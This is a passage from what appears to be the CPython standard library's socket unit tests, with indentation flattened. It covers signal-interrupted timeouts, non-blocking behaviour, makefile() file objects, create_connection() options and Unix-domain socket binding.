# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase:
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
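    # The handler deliberately raises ZeroDivisionError (1 / 0): since
    # PEP 475, interrupted system calls are retried automatically unless
    # the signal handler raises, so raising is the only reliable way for
    # the tests below to observe the interruption.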
# Timeout for socket operations
timeout = support.LOOPBACK_TIMEOUT
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises the ZeroDivisionError
        # set up by the SIGALRM handler when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises the
        # ZeroDivisionError set up by the SIGALRM handler when interrupted
        # by a signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
        # Pass an actual address here because Python's wrapper for
        # sendto() doesn't allow a zero-length one; POSIX requires the
        # address to be ignored anyway, since the socket is
        # connection-mode.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EAGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
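    # For reference: setblocking(True) is equivalent to settimeout(None),
    # setblocking(False) to settimeout(0.0), and any positive timeout
    # keeps the underlying file descriptor in non-blocking mode (which is
    # what the O_NONBLOCK check above verifies when fcntl is available).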
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
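    # SOCK_NONBLOCK is a Linux extension that can be OR'ed into the socket
    # type so that the socket starts out non-blocking; Python then reports
    # a timeout of 0, effectively as if settimeout(0) had been called,
    # which is what assert_sock_timeout() checks above.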
def testInheritFlagsBlocking(self):
        # bpo-7995: when accept() is called on a listening socket with a
        # timeout and the default timeout is None, the resulting socket
        # must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
        # bpo-7995: when accept() is called on a listening socket with a
        # timeout and the default timeout is not None, the resulting
        # socket must inherit the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(False)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], support.LONG_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(False)
        # the client didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], support.LONG_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
        # the client sent data: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(TimeoutError, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
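    # In non-blocking mode the raw SocketIO object returned by makefile()
    # signals "no data available right now" by returning None from read()
    # and readinto() (standard io.RawIOBase behaviour) instead of raising,
    # which is why the assertions below compare results against None.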
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
        # The client thread can't skip directly: a SkipTest exception
        # raised there would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
        # This class is inherited below by BasicTCPTest2, which also
        # inherits BasicTCPTest; BasicTCPTest defines the self.port
        # referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise TimeoutError('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = socket_helper.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = socket_helper.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
        # create_connection() enumerates through all the addresses returned
        # and, if it doesn't successfully connect to any of them, it
        # propagates the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = socket_helper.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except TimeoutError:
pass
except OSError as exc:
if socket_helper.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('TimeoutError not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = socket_helper.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
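    # The server side of each test below only needs to accept (and close)
    # the incoming connection, so every server-side test method is bound
    # to _justAccept; the interesting assertions run in the corresponding
    # client-side _test* method.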
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(TimeoutError, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
            # No alarm can be pending now, so it's safe to restore the
            # old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
self.assertIs(socket.error, OSError)
self.assertIs(socket.timeout, TimeoutError)
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
socket_helper.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(os_helper.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if os_helper.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(os_helper.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
